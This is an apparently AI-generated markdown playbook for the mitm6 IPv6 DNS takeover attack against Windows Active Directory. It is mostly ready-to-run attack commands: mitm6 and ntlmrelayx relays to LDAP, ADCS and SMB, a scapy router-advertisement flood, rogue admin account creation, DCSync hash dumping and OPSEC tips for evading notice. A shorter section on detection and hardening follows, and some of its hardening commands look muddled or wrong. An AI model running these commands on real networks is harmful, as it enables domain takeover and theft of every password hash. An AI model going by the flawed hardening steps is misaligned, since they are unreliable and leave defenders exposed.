attack-9-mitm6-ipv6-dns-spoofing-dhcpv6-takeover.md (28171B)
1 --- 2 title: "Attack #9 β mitm6 (IPv6 DNS Spoofing DHCPv6 Takeover)" 3 description: "mitm6 exploits a fundamental default behaviour of Windows: even in networks that have never deployed IPv6, every Windows machine continuously sends DHCPv6β¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "credential-access", "ntlm", "relay"] 7 tools: ["Nmap", "NetExec", "Impacket", "Rubeus", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #9 β mitm6 (IPv6 DNS Spoofing DHCPv6 Takeover).md" 11 --- 12 # π΄ Attack #9 β mitm6 (IPv6 DNS Spoofing / DHCPv6 Takeover) 13 14 *** 15 16 ## π How It Works 17 18 mitm6 exploits a **fundamental default behaviour of Windows**: even in networks that have never deployed IPv6, every Windows machine continuously sends DHCPv6 Solicit messages at boot, on network reconnect, and periodically during operation, asking if there is an IPv6 DHCP server available. Since most enterprise networks have no legitimate DHCPv6 server, these broadcasts go unanswered β and that silence is the attack surface. 19 20 The attacker runs mitm6, which responds to every DHCPv6 Solicit with a rogue DHCPv6 Reply, assigning the victim a link-local IPv6 address and β most critically β **designating the attacker's machine as the victim's primary DNS server**. Because Windows prefers IPv6 over IPv4 for DNS resolution, all subsequent DNS queries flow to the attacker. mitm6 then responds to specific queries (particularly WPAD) with its own IP, forcing the victim to initiate NTLM authentication to the attacker. ntlmrelayx relays that authentication to LDAP on the DC, and in the best case β an admin logging in β it automatically **creates a new Domain Admin account or adds DCSync rights** within seconds. 21 22 A study of default-configuration Windows systems found that **95% are vulnerable** to credential harvesting via this IPv6 DNS manipulation. 23 24 > β οΈ **Windows 11 / Server 2025:** DHCPv6 remains enabled by default on all recent Windows versions. The mitigation is not automatic β administrators must explicitly disable it via GPO. IPv6 is **deeply embedded** in modern Windows kernels and disabling it is more difficult than in earlier versions. 25 26 ### Why mitm6 Beats LLMNR Poisoning in Hardened Environments 27 28 | Property | LLMNR/NBT-NS Poisoning | mitm6 | 29 |---|---|---| 30 | **Protocol abused** | LLMNR (UDP 5355) / NBT-NS (UDP 137) | DHCPv6 (UDP 546/547) + DNS (UDP 53) | 31 | **Blocked by GPO?** | β Easy to disable | β Rarely disabled β DHCPv6 seen as benign | 32 | **Requires DNS failure** | β Only fires on failed DNS lookups | β Works even with perfect DNS | 33 | **Scope** | Only catches failed name resolutions | Intercepts ALL DNS queries from victims | 34 | **Trigger** | Passive β user must make typo/broken path | Active β fires on every boot / network reconnect | 35 | **Works if IPv6 disabled** | N/A | β Fails if IPv6 completely disabled | 36 37 ### The Full Attack Flow 38 39 ``` 40 1. Attacker runs mitm6 on the internal network 41 2. Windows machines send periodic DHCPv6 Solicit broadcasts (boot/reconnect) 42 3. mitm6 responds with rogue DHCPv6 Reply: 43 - Assigns victim a link-local IPv6 address 44 - Sets ATTACKER as victim's primary IPv6 DNS server 45 4. Victim's Windows now sends ALL DNS queries to attacker 46 5. mitm6 answers WPAD queries with attacker's IP β victim fetches fake PAC file 47 6. WPAD PAC fetch triggers NTLM authentication to attacker (NTLMv2 hash sent) 48 7. ntlmrelayx relays NTLM auth to LDAP/LDAPS on the DC 49 8. ntlmrelayx escalates: 50 - Creates new user in Domain Admins / Enterprise Admins group (if DA relayed) 51 - Adds DCSync rights to attacker-controlled account (if high-priv user relayed) 52 - Adds attacker-controlled machine account (if regular user relayed) 53 9. Full domain compromise achieved β no initial credentials required 54 ``` 55 56 *** 57 58 ## βοΈ Prerequisites 59 60 | Requirement | Detail | 61 |---|---| 62 | **Internal network access** | Must be on same subnet as victims β broadcast domain required for DHCPv6 | 63 | **IPv6 not fully disabled** | If IPv6 is completely disabled on all hosts, attack fails β but this is rare | 64 | **DHCPv6 not blocked by firewall** | If UDP 546/547 inbound is blocked by Windows Firewall GPO, mitm6 can't respond | 65 | **NTLM not disabled** | Relay chain requires NTLM (though Kerberos relay variants exist β see CVE-2026-20929) | 66 | **LDAP signing/channel binding not enforced** | For LDAP relay to DC; if enforced, relay to LDAPS or SMB instead | 67 | **Wait for trigger event** | Must wait for victim machine to reboot, reconnect, or periodically refresh DHCPv6 | 68 69 *** 70 71 ## π οΈ Tools 72 73 | Tool | Platform | Role | 74 |---|---|---| 75 | **mitm6** | Linux | Core DHCPv6/DNS spoofer β the entire attack starts here | 76 | **ntlmrelayx.py** (Impacket) | Linux | Relay engine β receives NTLM from mitm6 victims, relays to DC LDAP | 77 | **Responder** | Linux | Optional β can run alongside mitm6 for additional hash capture | 78 | **secretsdump.py** | Linux | Post-exploitation β DCSync after relayed escalation | 79 | **Wireshark / tcpdump** | Linux | Monitor DHCPv6 traffic; verify victims are being assigned rogue DNS | 80 | **BloodHound / SharpHound** | Both | Post-DA β enumerate domain using newly created account | 81 82 *** 83 84 ## π» Full Commands 85 86 ### π΅ Step 0 β Verify IPv6 is Active on the Network 87 88 ```bash 89 # ββ Passive capture β verify DHCPv6 Solicit broadcasts βββββββββββββββββββββββ 90 sudo tcpdump -i eth0 udp port 546 or udp port 547 -v 91 # You should see DHCPv6 Solicit messages from Windows machines 92 # If you see nothing, IPv6 may be disabled on the subnet 93 94 # ββ Wireshark filter ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 95 # Filter: dhcpv6 or icmpv6 96 97 # ββ Nmap β enumerate IPv6-enabled hosts ββββββββββββββββββββββββββββββββββββββ 98 nmap -6 -sn fe80::/64 99 nmap -6 --script=ipv6-multicast-mld-list -p 0 <target> 100 101 # ββ Check if WPAD is resolvable (pre-attack reconnaissance) ββββββββββββββββββ 102 nslookup wpad 103 # If "Non-existent domain" β mitm6 will intercept the WPAD query 104 ``` 105 106 *** 107 108 ### π΄ mitm6 β Core Tool Setup 109 110 ```bash 111 # ββ Install mitm6 βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 112 pip3 install mitm6 113 # or 114 git clone https://github.com/dirkjanm/mitm6 115 cd mitm6 && pip3 install . 116 117 # ββ Basic run β target a specific domain βββββββββββββββββββββββββββββββββββββ 118 sudo mitm6 -d corp.local 119 120 # ββ Recommended run β target domain, suppress router advertisements βββββββββββ 121 sudo mitm6 -d corp.local --no-ra 122 # --no-ra = don't send Router Advertisements (reduces noise, more targeted) 123 124 # ββ Specify network interface explicitly βββββββββββββββββββββββββββββββββββββ 125 sudo mitm6 -i eth0 -d corp.local --no-ra 126 127 # ββ Target a specific subnet only βββββββββββββββββββββββββββββββββββββββββββββ 128 sudo mitm6 -d corp.local -i eth0 --ignore-nofqdn --no-ra 129 130 # ββ Verbose output (see each DHCPv6 response sent) βββββββββββββββββββββββββββ 131 sudo mitm6 -d corp.local --no-ra -v 132 133 # ββ What you'll see in output: 134 # [*] Sent spoofed reply to fe80::xxxx for WPAD.corp.local 135 # [*] Sent spoofed reply to fe80::xxxx for corp.local 136 # This means victims are now routing DNS through you 137 ``` 138 139 *** 140 141 ### π΄ ntlmrelayx Setup β LDAP Relay for DA Account Creation 142 143 ```bash 144 # ββ STEP 1: Prepare relay to LDAP (primary escalation method) βββββββββββββββββ 145 146 # Relay to LDAP β auto-create new user in Domain Admins (if DA logs in) 147 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 148 -smb2support -l loot/ 149 150 # ββ Flags explained: 151 # -6 = enable IPv6 support (critical for mitm6 relay) 152 # -t ldap:// = relay target (DC LDAP) 153 # -wh = WPAD hostname to respond to (attacker-wpad = your machine's name) 154 # -smb2support = support SMBv2 on the relay listener 155 # -l loot/ = dump LDAP info to this directory 156 157 # ββ Relay to LDAPS (if LDAP signing enforced) βββββββββββββββββββββββββββββββββ 158 ntlmrelayx.py -6 -t ldaps://DC01.corp.local -wh attacker-wpad \ 159 -smb2support -l loot/ 160 161 # ββ STEP 2: Run mitm6 in a separate terminal ββββββββββββββββββββββββββββββββββ 162 sudo mitm6 -d corp.local --no-ra 163 164 # ββ STEP 3: Wait for a privileged user to log in or machine to reboot βββββββββ 165 # ntlmrelayx output when DA is relayed: 166 # [*] HTTPD(80): Connection from 10.10.10.50 controlled, attacking target ldap://DC01.corp.local 167 # [*] Authenticating against ldap://DC01.corp.local as CORP\Administrator 168 # [*] Adding new user with username: QMFbhMXG and password: XYZ to domain 169 # [*] Privilege Escalation Done! QMFbhMXG is in the Administrators group! 170 171 echo "Domain Admin account created β game over" 172 ``` 173 174 *** 175 176 ### π΄ Full Attack Chain β mitm6 β LDAP Relay β DCSync 177 178 ```bash 179 # ββ Terminal 1: Start mitm6 βββββββββββββββββββββββββββββββββββββββββββββββββββ 180 sudo mitm6 -d corp.local --no-ra -i eth0 181 182 # ββ Terminal 2: Start ntlmrelayx with LDAP target + loot dump ββββββββββββββββ 183 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 184 -smb2support -l loot/ --no-da --no-acl 185 186 # Wait for a domain user to authenticate... 187 188 # ββ Terminal 3 (after successful relay): Check loot directory ββββββββββββββββ 189 ls loot/ 190 # Contains: domain_computers.html, domain_users.html, domain_groups.html etc. 191 cat loot/domain_users.html 192 193 # ββ If a Domain Admin was relayed β new account auto-created βββββββββββββββββ 194 # ntlmrelayx creates: random username + random password 195 # Check ntlmrelayx output for the credentials 196 197 # ββ DCSync using the newly created DA account βββββββββββββββββββββββββββββββββ 198 secretsdump.py corp.local/QMFbhMXG:'CreatedPassword'@DC01.corp.local 199 200 # ββ OR add DCSync rights to your own pre-created account βββββββββββββββββββββ 201 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 202 -smb2support --escalate-user low_user 203 204 # After escalation: 205 secretsdump.py corp.local/low_user:'KnownPassword'@DC01.corp.local -just-dc-ntlm 206 ``` 207 208 *** 209 210 ### π΄ mitm6 β ADCS Relay (Most Destructive Chain) 211 212 ```bash 213 # ββ If LDAP signing/channel binding blocks LDAP relay, target ADCS instead βββ 214 215 # Terminal 1: mitm6 216 sudo mitm6 -d corp.local --no-ra 217 218 # Terminal 2: ntlmrelayx to ADCS HTTP enrollment endpoint 219 ntlmrelayx.py -6 -t http://ADCS01.corp.local/certsrv/certfnsh.asp \ 220 -wh attacker-wpad -smb2support --adcs --template "DomainController" 221 222 # When DC machine account authenticates (via coercion or reboot): 223 # ntlmrelayx requests a DomainController template certificate for DC01$ 224 # Output: [*] Got certificate! Saved as DC01$.pfx 225 226 # Request TGT using the DC machine certificate (PKINIT) 227 .\Rubeus.exe asktgt /user:DC01$ /certificate:DC01$.pfx /password:'' /ptt /nowrap 228 229 # DCSync using DC machine account TGT 230 secretsdump.py -k -no-pass corp.local/'DC01$'@DC01.corp.local -just-dc-ntlm 231 232 # Result: Full domain hash dump β total compromise 233 ``` 234 235 *** 236 237 ### π΄ mitm6 β SMB Relay (Alternative When LDAP Is Locked Down) 238 239 ```bash 240 # Terminal 1: mitm6 241 sudo mitm6 -d corp.local --no-ra 242 243 # Terminal 2: ntlmrelayx to SMB targets (SMB signing must be disabled on target) 244 nxc smb 10.10.10.0/24 --gen-relay-list smb_targets.txt 245 ntlmrelayx.py -6 -tf smb_targets.txt -wh attacker-wpad \ 246 -smb2support -i 247 248 # When relay succeeds to SMB target: 249 nc 127.0.0.1 11000 # Interactive SMB shell as relayed user 250 251 # Execute commands on relayed target 252 ntlmrelayx.py -6 -tf smb_targets.txt -wh attacker-wpad \ 253 -smb2support -c "net user hacker P@ssword123! /add && net localgroup administrators hacker /add" 254 ``` 255 256 *** 257 258 ### π΄ Advanced: krbrelayx Integration β Kerberos Relay via mitm6 259 260 ```bash 261 # ββ CVE-2026-20929: Relay Kerberos tickets instead of NTLM βββββββββββββββββ 262 # This bypasses some defences designed for NTLM-only relay 263 264 # Terminal 1: mitm6 265 sudo mitm6 -d corp.local --no-ra 266 267 # Terminal 2: krbrelayx β accepts Kerberos from mitm6 victims 268 python3 krbrelayx.py -ts DC01.corp.local 269 270 # Terminal 3: On DC, check for new account creation (same as LDAP relay) 271 # krbrelayx will auto-escalate if a machine account with sufficient privileges relays 272 273 # This is more stealthy than NTLM relay in modern defences 274 ``` 275 276 *** 277 278 ### π΄ RA Flooding β Alternative When DHCPv6 Relay Fails 279 280 ```bash 281 # ββ If DHCPv6 isn't triggering, use Router Advertisement flooding ββββββββββββ 282 283 # Terminal 1: RA flood (forces IPv6 priority without DHCP) 284 sudo python3 -m pip install scapy 285 python3 - <<'EOF' 286 from scapy.all import * 287 from scapy.layers.inet6 import * 288 289 iface = "eth0" 290 target_prefix = "2001:db8::/64" # Your target IPv6 prefix 291 292 def flood_ra(): 293 pkt = Ether()/IPv6(src="fe80::1", dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix=target_prefix) 294 while True: 295 sendp(pkt, iface=iface, interval=1, verbose=0) 296 297 flood_ra() 298 EOF 299 300 # This forces all victims to prefer IPv6 β DNS then flows to your mitm6 301 ``` 302 303 *** 304 305 ### π΄ Delegate Access β Targeted Domain Escalation via Relay 306 307 ```bash 308 # ββ Instead of creating new user, grant specific rights to existing user βββββ 309 310 # ntlmrelayx with --escalate-user (adds DCSync rights) 311 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 312 -smb2support --escalate-user "corp\low_priv_user" 313 314 # ntlmrelayx with --add-computer (add computer account) 315 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 316 -smb2support --add-computer attacker-owned 317 318 # ntlmrelayx with --no-acl (just dump LDAP, don't modify) 319 ntlmrelayx.py -6 -t ldap://DC01.corp.local -wh attacker-wpad \ 320 -smb2support --no-acl 321 322 # Specific escalation after relay β read the LDAP dump first, then decide 323 secretsdump.py -hashes :HASH corp.local/elevated_user@DC01.corp.local -just-dc-ntlm 324 ``` 325 326 *** 327 328 ### π΄ Monitoring β Verify mitm6 is Working 329 330 ```bash 331 # ββ Check which victims have been assigned rogue DNS βββββββββββββββββββββββββ 332 sudo tcpdump -i eth0 udp port 547 -v | grep -i "solicit\|advertise\|reply" 333 334 # ββ Watch for WPAD requests hitting your machine ββββββββββββββββββββββββββββββ 335 sudo tcpdump -i eth0 port 80 -v | grep -i "wpad" 336 337 # ββ Monitor ntlmrelayx for successful relays ββββββββββββββββββββββββββββββββββ 338 # Watch for lines containing: 339 # "HTTPD: Received connection from..." 340 # "Authenticating against ldap://..." 341 # "Adding new user..." 342 # "Privilege Escalation Done!" 343 ``` 344 345 *** 346 347 ## π§© Troubleshooting 348 349 | Error | Cause | Fix | 350 |---|---|---| 351 | **mitm6 not receiving DHCPv6 Solicit messages** | IPv6 disabled on victim network or firewall blocking UDP 546/547 | Run `sudo tcpdump udp port 546` to verify DHCPv6 traffic exists; if none, try different subnet or disable IPv6 filtering | 352 | **ntlmrelayx LDAP relay fails with "signing error"** | LDAP signing or channel binding enforced on DC | Switch to LDAPS (`-t ldaps://`), ADCS HTTP relay, or SMB relay instead | 353 | **No WPAD requests seen in ntlmrelayx output** | WPAD proxy already configured on victims via GPO, or DNS not redirecting | Verify mitm6 is responding to WPAD queries with `tcpdump port 80`; check if victims have hardcoded WPAD server in registry | 354 | **IPv6 completely disabled on subnet** | GPO or Registry DisabledComponents flag set to 0xFF | Impossible to exploit with mitm6; use LLMNR/NBT-NS poisoning instead | 355 | **Relay target unreachable after NTLM capture** | Firewall rule blocks attackerβDC on port 389/636 (LDAP/LDAPS) | Confirm network path with `nc -zv DC01.corp.local 389`; consider SMB relay (port 445) as alternative | 356 | **ntlmrelayx creates user but no DCSync rights** | Relay not from Domain Admin or Enterprise Admin | Use `--escalate-user` flag instead; or wait for DA to authenticate | 357 | **mitm6 causes network-wide DNS failures** | Router Advertisement (RA) messages disrupting routing | Always use `--no-ra` flag; scope to exact domain with `-d corp.local` | 358 | **Relay account created but can't use it for DCSync** | Account locked, password expired, or UPN format wrong | Verify format: `secretsdump.py corp.local/USERNAME:'PASSWORD'@DC01.corp.local`; check account status with `net user` | 359 360 *** 361 362 ## π― OPSEC Tips 363 364 - **Always use `--no-ra`** β Router Advertisement messages are noisy and can disrupt network routing for all victims, which causes immediate IT investigation 365 - **Scope to your target domain** with `-d corp.local` β without this, mitm6 answers ALL DNS queries including internet traffic, causing visible disruption 366 - **Run during high-activity windows** β morning logon storms (8β9am), after patching cycles, or when large numbers of machines reboot give you maximum relay opportunities 367 - **Target LDAP over SMB** when possible β LDAP relay creates persistent domain objects (new admin users, DCSync rights) rather than temporary shell access 368 - **Use `--no-da --no-acl` flags in ntlmrelayx initially** β dump LDAP info first to understand the domain before making noisy modifications 369 - **mitm6 causes minor IPv6 disruption** β some machines may experience temporary DNS resolution issues; keep attack windows short (15β30 minutes) 370 - **Combine with Responder on different protocols** β run mitm6 for DHCPv6/DNS and Responder in analyse mode simultaneously to map the full authentication landscape 371 - **Time-to-execute estimate:** mitm6 setup (5 min) + waiting for trigger event (5β30 min depending on logon activity) = 10β35 minutes to domain compromise 372 - **Tool versions:** Use latest Impacket for ntlmrelayx (GitHub main branch preferred over pip); mitm6 1.0+ recommended; test in lab first for version compatibility 373 374 *** 375 376 ## π‘οΈ Detection β Event IDs / Network Indicators 377 378 | Source | What to Look For | 379 |---|---| 380 | **Windows Event 4741** | New computer account created β ntlmrelayx `--add-computer` via relayed auth | 381 | **Windows Event 4728/4732** | User added to privileged group β DA account creation by ntlmrelayx | 382 | **Windows Event 4662** | ACE modification on AD object β DCSync rights being granted to account | 383 | **Windows Event 4624 Type 3** | Logon from unexpected source IP (attacker's machine) | 384 | **Network β DHCPv6 UDP 546/547** | Rogue DHCPv6 server responding on the subnet (only one should exist) | 385 | **Network β DNS** | Unusual DNS responses from non-DC IP addresses; WPAD queries answered by unexpected host | 386 | **IDS/Zeek/Suricata** | DHCPv6 Advertise/Reply messages from a host not designated as a DHCP server | 387 | **SIEM** | New privileged accounts created outside of standard provisioning workflows | 388 389 **Primary detection signature:** A **DHCPv6 Reply or Advertisement packet from a host that is not the legitimate DHCP server** is an immediate indicator of mitm6 in operation. Network-level detection via Zeek scripts or Suricata rules monitoring DHCPv6 traffic is the most reliable defence. On the Windows side, a new Domain Admin account created without a corresponding ITSM ticket is a high-confidence alert. 390 391 ### Sigma Rules for Detection 392 393 **Rule: Rogue DHCPv6 Server Detection** 394 ```yaml 395 title: DHCPv6 Advertise from Non-DHCP Host 396 detection: 397 selection: 398 NetworkProtocol: DHCPv6 399 DHCPv6MessageType: Advertise 400 SourceIP: '!10.10.10.10' # Exclude legitimate DHCP server 401 condition: selection 402 ``` 403 404 **Rule: Suspicious LDAP Modifications via Relay** 405 ```yaml 406 title: Bulk LDAP Group Modification (Possible Relay) 407 detection: 408 selection: 409 EventID: 5136 410 ObjectClass: group 411 AttributeLDAPDisplayName: member 412 ValueAdded: '*' 413 condition: selection | count(ObjectDN) > 5 and timespan(5m) 414 ``` 415 416 ### EDR-Specific Detections 417 418 - **Crowdstrike Falcon:** Monitor for IPv6 DNS server changes + NTLM relay auth in short time window 419 - **Defender for Endpoint:** Alert on new user creation by system processes; flag DHCPv6 server role changes 420 - **Sentinel One:** Watch for network discovery commands (ipconfig /all, Get-NetIPConfiguration) followed by WPAD lookups 421 - **Carbon Black:** Correlate ntlmrelayx.py process creation with ldap:// network connections to DC 422 423 ### Hardening Commands 424 425 ```powershell 426 # ββ Disable DHCPv6 client via Group Policy βββββββββββββββββββββββββββββββββ 427 Computer Configuration β Administrative Templates β 428 Network β TCPIP Settings β IPv6 Transition Technologies 429 Set "6to4 State" = Disabled 430 Set "ISATAP State" = Disabled 431 432 # ββ Registry-based mitigation (local machine) ββββββββββββββββββββββββββββββββ 433 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters" /v DisabledComponents /t REG_DWORD /d 0xFF /f 434 # 0xFF disables all IPv6 completely (aggressive but effective) 435 # 0x01 disables IPv6 on all non-tunnel interfaces (balanced) 436 437 # ββ Windows Firewall β Block DHCPv6 inbound βββββββββββββββββββββββββββββββββββ 438 powershell -NoProfile -Command "Get-NetFirewallRule -DisplayName '*DHCPv6*' | Set-NetFirewallRule -Enabled False" 439 440 # ββ IPv6 priority adjustment (reduces DHCPv6 preference) ββββββββββββββββββββ 441 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters" /v IpUseDhcpNameServer /t REG_DWORD /d 0 /f 442 443 # ββ RA Guard (prevents rogue router advertisements) βββββββββββββββββββββββββββ 444 # On edge firewall/router: 445 # Cisco: ipv6 nd raguard attach-policy {policy-name} 446 # Juniper: forwarding-options family inet6 router-discovery {ra-guard} 447 448 # ββ Enforce LDAP signing + channel binding on DC ββββββββββββββββββββββββββββ 449 dsregcmd /status # Check current settings 450 # Set via GPO: Computer Config β Policies β Windows Settings β Security Settings β 451 # Local Policies β Security Options: 452 # "Domain member: Require strong (Windows 2000 or later) session key" 453 # "LDAP client signing requirements" = Require Signing 454 ``` 455 456 *** 457 458 ## πΊοΈ MITRE ATT&CK 459 460 | Technique | ID | Description | 461 |---|---|---| 462 | **Adversary-in-the-Middle** | T1557 | mitm6 performs MITM on IPv6 DNS traffic | 463 | **LLMNR/NBT-NS Poisoning** | T1557.001 | DHCPv6 hijacking is conceptually similar to LLMNR poisoning β intercepting legitimate protocol to redirect to attacker | 464 | **Exploitation for Privilege Escalation** | T1548 | ntlmrelayx relay chain escalates from low user to Domain Admin | 465 | **Account Manipulation** | T1098 | Creation of new Domain Admin account via relayed LDAP authentication | 466 | **NTLM Relay** | (Implied T1557 + T1040) | Core technique: capture NTLM auth, relay to different service | 467 468 *** 469 470 ## π Attack Chain Context 471 472 ``` 473 [mitm6 DHCPv6 Poisoning] βββ Rogue DNS Server for All Subnet Victims 474 β 475 ββββ WPAD NTLM Auth β ntlmrelayx LDAP β New DA Account β DCSync 476 ββββ WPAD NTLM Auth β ntlmrelayx LDAPS β Shadow Credentials β TGT 477 ββββ WPAD NTLM Auth β ntlmrelayx ADCS β DC Cert β TGT β DCSync 478 ββββ WPAD NTLM Auth β ntlmrelayx SMB β Shell + LSASS dump β PtH 479 ββββ DNS hijack β redirect all traffic β full MitM for credential harvest 480 ββββ Wait for DA to log in β instant Enterprise Admin creation β game over 481 ``` 482 483 **The scenario that ends engagements in minutes:** mitm6 is running. An administrator logs into any domain-joined workstation on the subnet β even just to check something. Their machine sends a DHCPv6 Solicit. mitm6 responds. WPAD queries flow to the attacker. NTLM authentication arrives at ntlmrelayx. ntlmrelayx relays to DC LDAP. A new account is created in Domain Admins. DCSync is run. Every domain password hash is exfiltrated. **Total time: under 3 minutes**. 484 485 **Cross-references:** 486 - Attack #10: Credential Hunting in Shares / GPP Passwords (alternative initial access without relay) 487 - Attack #72: LAPS Deprecation & Takeover (modern mitigation mechanism, but requires proper deployment) 488 489 *** 490 491 > β **Attack #9 β mitm6 complete.** Tell me to move on when you're ready for **Attack #10 β Credential Hunting in Shares / GPP Passwords**. 492 493 Sources 494 MITM6 + NTLM Relay: How IPv6 Auto-Configuration Leads to Full ... https://www.resecurity.com/blog/article/mitm6-ntlm-relay-how-ipv6-auto-configuration-leads-to-full-domain-compromise 495 IPv6 Attacks - README - Preperation | OSCP https://oscp.adot8.com/active-directory/initial-attack-strategy/ipv6-attacks 496 MITM6 IPv6 Attack | Pentesting Checklist - GitBook https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/initial-attack-vectors/mitm6-ipv6-attack 497 [PDF] Exploiting Ipv6 DNS Behavior in Windows 11 Networks - IJFMR https://www.ijfmr.com/papers/2025/6/58968.pdf 498 IPv6 - Man in the Middle | We explain attack and defense - ProSec https://www.prosec-networks.com/en/blog/ipv6-mitm/ 499 IPv6 DNS Takeover with MitM6: Strategies for Network Security https://www.evolvesecurity.com/blog-posts/tools-of-the-trade-ipv6-dns-takeover-with-mitm6 500 IPv6 Attacks - Infosec Notes https://notes.frozensoliddesigns.com/exploitation/active-directory/ipv6-attacks 501 Fragmentation Considered Poisonous https://arxiv.org/pdf/1205.4011.pdf 502 Security of Patched DNS http://arxiv.org/pdf/1205.5190.pdf 503 The Impact of DNS Insecurity on Time https://arxiv.org/pdf/2010.09338.pdf 504 Hybrid Detection and Mitigation of DNS Protocol MITM attack based on Firefly algorithm with Elliptical Curve Cryptography https://publications.eai.eu/index.php/phat/article/download/3177/2319 505 Injection Attacks Reloaded: Tunnelling Malicious Payloads over DNS https://arxiv.org/pdf/2205.05439.pdf 506 Encrypted and Covert DNS Queries for Botnets: Challenges and 507 Countermeasures http://arxiv.org/pdf/1909.07099.pdf 508 HADES: Detecting Active Directory Attacks via Whole Network Provenance 509 Analytics http://arxiv.org/pdf/2407.18858.pdf 510 A Survey on Malicious Domains Detection through DNS Data Analysis https://arxiv.org/pdf/1805.08426.pdf 511 IPv6 Attack with MITM6 & NTLMRELAYX - YouTube https://www.youtube.com/watch?v=AmcWc2CjXx8 512 How to prevent IPv6 DNS Takeover with mitm6 - LinkedIn https://www.linkedin.com/posts/abdussatter51_ipv6-dns-take-over-on-active-directory-activity-7319677013928067072-PP3o 513 Relaying Kerberos with MiTM6 - CVE-2026-20929 - YouTube https://www.youtube.com/watch?v=RGoSvD-P_FU 514 Hacks Weekly #61 - Man in the middle with MITM6 and NTLMRelay https://www.youtube.com/watch?v=qb0l5cPz0nw 515 Domain Admin via IPv6 DNS Takeover : r/HowToHack - Reddit https://www.reddit.com/r/HowToHack/comments/e8n67r/domain_admin_via_ipv6_dns_takeover/ 516 Six Minutes for MiTM6 - YouTube https://www.youtube.com/watch?v=qrFxDNotgO8 517 Network Relaying and NTLM Relay Attacks in Windows Domains https://www.lrqa.com/en/cyber-labs/network-relaying-abuse-windows-domain/ 518 caster0x00/Intercept: MITM Field Manual - GitHub https://github.com/caster0x00/MITMonster